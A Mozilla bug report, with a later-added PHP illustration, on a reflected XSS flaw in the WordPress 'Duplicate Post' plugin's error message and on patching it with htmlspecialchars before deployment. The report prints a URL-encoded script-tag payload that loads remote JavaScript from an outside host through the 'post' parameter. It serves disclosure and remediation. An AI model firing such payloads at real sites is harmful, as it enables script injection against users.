Bug 770300 - "Duplicate Post" WP Plugin - Fix XSS Before Adding to Air Mozilla Blog
Status: RESOLVED FIXED (Closed)
Opened 12 years ago; Closed 12 years ago
Component: Infrastructure & Operations Graveyard :: WebOps: Other (task)
Tracking: Not tracked
Reporter: mfuller; Assigned: dmaher
Keywords: wsec-xss
Bug 748584 requests that we add the "Duplicate Post" plugin to the Air Mozilla WordPress instance. During the security review, an XSS vulnerability was discovered. Before we can install the plugin, this code must be patched.

The issue occurs in the page: duplicate-post-admin.php. The parameter, $id, is saved using $_GET['post']. A URL may look like:

site.com/wp-admin/admin.php?action=duplicate_post_save_as_new_post&post=1

where '1' is the post to copy. However, if '1' doesn't exist, an error message is displayed, echoing '1' out without properly escaping. This allows the code:

<SCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js><%2FSCRIPT>

as a parameter of 'post' to create XSS.

To fix this issue, use htmlspecialchars on the output of $id in the following line:

wp_die(esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN)) . ' ' . $id);
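The unescaped message from the description beside the escaped form the reporter asks for, as an added example that is not part of this bug or of the plugin's code. The WordPress functions __() and esc_attr() are replaced by minimal stand-ins (assumed here, not the real implementations) so the script runs without WordPress, and the input value is constructed.

```php
<?php
// Added example: the wp_die() message from duplicate-post-admin.php as the
// plugin builds it, next to the patched version. Stand-ins below replace the
// WordPress functions so this file runs on plain PHP.
const DUPLICATE_POST_I18N_DOMAIN = 'duplicate-post';

// Stand-in for WordPress __(): returns the string untranslated.
function __($text, $domain = 'default') {
    return $text;
}

// Stand-in for WordPress esc_attr(): entity-encode the four HTML metacharacters.
// (The real esc_attr() does more normalisation; this is enough for the comparison.)
function esc_attr($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// As shipped: the static label is escaped, but $id (straight from $_GET['post'])
// is concatenated raw, so any markup in the query string reaches the response.
function message_vulnerable($id) {
    return esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN))
        . ' ' . $id;
}

// The fix requested in the bug: escape $id with htmlspecialchars() before output.
function message_fixed($id) {
    return esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN))
        . ' ' . htmlspecialchars($id, ENT_QUOTES, 'UTF-8');
}

// Constructed input standing in for a non-numeric ?post= value (no real post id).
$id = isset($_GET['post']) ? $_GET['post'] : '<b>constructed</b>';

echo "unescaped: ", message_vulnerable($id), "\n"; // the tags are emitted as markup
echo "escaped:   ", message_fixed($id), "\n";      // the tags are emitted as entities
```

Since a post id is numeric, casting $id to an integer before it is used would reject such input outright; the bug asks only for the output escaping shown here.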
Comment 1•12 years ago
I sent the developer of the plug-in a link to this bug.
Reporter
Comment 2•12 years ago
I also emailed the developer the day I found the bug and he replied saying he would provide an update. If this is not an urgent install for the blog owner, we can go ahead and wait for his update. If it is urgent, the fix involves adding one function around one line of code after the plugin is installed. Either way, let me know and I'll re-review it once it's updated. Thanks, Matt
Comment 3•12 years ago
Assigning to WebOps to patch locally for deployment.
Assignee: nobody → server-ops-webops
Component: air.mozilla.com → Server Operations: Web Operations
Product: Websites → mozilla.org
QA Contact: cshields
Version: Firefox 6 → other
Comment 4•12 years ago
:zandr both -dev and -stage are now running the new reboot code for air.m.o, which is not WordPress based. On the production nodes, there is no Duplicate Post plugin, as expected. Is there something specific you're looking for us (webops) to complete for you on this?
Assignee
Updated•12 years ago
Assignee: server-ops-webops → dmaher
Assignee
Comment 5•12 years ago
:cturra so the request is that webops implement the plugin in prod, but instead of running the vanilla code, we patch it as indicated in comment #1. My plan is to pull the plugin repo as normal, create a local branch, modify the code, and roll with that. :richard has confirmed that the prod site is EOL right now anyways, so we don't need to worry about long-term support.
Assignee
Comment 6•12 years ago
Since creating local-only branches is not possible in svn, I instead simply downloaded the plugin tarball, decompressed it to the correct location, and patched it as necessary. I also added a README.duplicate-post documenting the change. I realise that this is a one-off, but this version of AirMo is EOL, so we don't need to worry about long-term support for this plugin. I have confirmed with :richard that the plugin is operational. Closing bug.
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Reporter
Comment 7•12 years ago
Thanks for your work on this!
Comment 8•11 years ago
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Updated•11 years ago
Component: Server Operations: Web Operations → WebOps: Other
Product: mozilla.org → Infrastructure & Operations
Updated•5 years ago
Product: Infrastructure & Operations → Infrastructure & Operations Graveyard